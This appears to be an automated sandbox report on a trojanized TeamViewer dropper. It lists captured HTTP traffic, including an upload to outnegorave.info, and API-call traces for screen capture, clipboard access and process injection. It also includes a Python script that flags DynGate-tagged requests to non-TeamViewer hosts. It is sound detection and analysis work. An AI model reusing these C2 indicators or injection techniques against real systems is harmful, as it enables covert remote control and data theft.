Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1 Accept: */* Content-Type: application/octet-stream Content-Transfer-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1 Accept: */* Content-Type: application/octet-stream Content-Transfer-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1 Accept: */* Content-Type: application/octet-stream Content-Transfer-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master1.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 37.252.232.109 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: 37.252.232.109 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
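The network entries above show the same "DynGate" user-agent, which belongs to TeamViewer's own client, used both for the expected exchange with master1.teamviewer.com and for a multipart POST to outnegorave.info. That mismatch between a vendor user-agent and a non-vendor destination is the practical detection hook. The script below is an added example, not part of this report and not TeamViewer code: it parses raw HTTP request heads and flags DynGate-tagged requests whose Host lies outside TeamViewer's domains. The sample requests are reconstructed from this page's entries with CRLFs restored and the long ?data= payloads dropped; the domain allowlist and the "review" treatment of IP-literal hosts are the editor's assumptions, not a list published by TeamViewer.

```python
import re

# Constructed sample: three requests from the report, CRLFs restored, payloads omitted.
SAMPLE_REQUESTS = [
    "GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)\r\n"
    "Host: master1.teamviewer.com\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)\r\n"
    "Host: 37.252.232.109\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "POST /B8C631A8/ HTTP/1.1\r\n"
    "Content-Length: 87812\r\n"
    "Content-Type: multipart/form-data; boundary=--------2771230636\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)\r\n"
    "Host: outnegorave.info\r\n"
    "Connection: Close\r\n"
    "Cache-Control: no-cache\r\n\r\n",
]

DYNGATE_UA = re.compile(r"\bDynGate\b")
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Assumption: domains a genuine TeamViewer client is expected to reach.
# Illustrative allowlist chosen by the editor, not an official TeamViewer list.
EXPECTED_DOMAINS = ("teamviewer.com", "dyngate.com")


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into method, path and lowercased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def in_expected_domain(host):
    return any(host == d or host.endswith("." + d) for d in EXPECTED_DOMAINS)


def classify(req):
    """Verdict for one parsed request.

    ignore     - no DynGate user-agent, outside the scope of this check
    expected   - DynGate UA to an allowlisted TeamViewer domain
    review     - DynGate UA to an IP literal; TeamViewer routers are reached by IP,
                 so ownership must be verified before deciding either way
    alert      - DynGate UA uploading (POST) to a domain outside the allowlist
    suspicious - DynGate UA to an unexpected domain without an upload
    """
    headers = req["headers"]
    if not DYNGATE_UA.search(headers.get("user-agent", "")):
        return "ignore"
    host = headers.get("host", "").split(":")[0].lower()
    if in_expected_domain(host):
        return "expected"
    if IP_LITERAL.match(host):
        return "review"
    if req["method"] == "POST":
        return "alert"
    return "suspicious"


def triage(raw_requests):
    """Map each raw request to (host, verdict, declared body size)."""
    results = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        size = int(req["headers"].get("content-length", "0"))
        results.append((host, classify(req), size))
    return results


if __name__ == "__main__":
    for host, verdict, size in triage(SAMPLE_REQUESTS):
        print(f"{verdict:10s} {host:28s} body={size}")
```

Run against the three reconstructed requests, the allowlisted master1.teamviewer.com request is "expected", the request to 37.252.232.109 lands in "review", and the 87812-byte multipart POST to outnegorave.info is the "alert". The body size is carried through because an upload of that size with a screen-capture-capable module in the same process is what an analyst will want to correlate next; the script itself makes no claim about what the body contained.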

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3366E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC, 2_2_6F3366E0
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard, 1_2_00405042
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33A130 CharLowerA,CreateEventA,GetLastError,CloseHandle,GetCurrentThreadId,GetThreadDesktop,CloseHandle,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,CloseHandle, 2_2_6F33A130

System Summary:

Uses 32bit PE files
Source: 77Etc0bR2v.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_0040323C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_6F335B40
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00404853 1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00406131 1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053C2D6 3_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004A13AA 3_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053E430 3_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004C97CD 3_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00534810 3_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_005438ED 3_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004AC8A9 3_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00544B6A 3_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004B9F5A 3_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00546FFB 3_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004A0FB2 3_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02723161 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272283C 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722424 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722004 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272460B 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02723161 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272283C 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722424 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722004 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272460B 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F6828 12_3_026F6828
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F7104 12_3_026F7104
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F6000 12_3_026F6000
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053BCE8 appears 68 times
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F333610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle, 2_2_6F333610
Contains functionality to call native functions
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, 1_2_00401000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B1F0 NtSuspendThread,NtClose, 2_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33ADE0 NtProtectVirtualMemory, 2_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33AFC0 NtGetContextThread,NtSetContextThread, 2_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 2_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B270 NtResumeThread,NtClose,HeapFree, 2_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33AD39 NtProtectVirtualMemory, 2_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33A500 NtQueryVirtualMemory, 2_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 2_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 2_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 2_2_6F337790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 2_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33AE20 NtOpenThread, 2_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 2_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 2_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 2_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 2_2_6F3314E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache, 2_2_6F33B2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 2_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3318D0 NtProtectVirtualMemory, 2_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33AFC0 NtGetContextThread,NtSetContextThread, 3_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 3_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33ADE0 NtProtectVirtualMemory, 3_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 3_2_6F337790
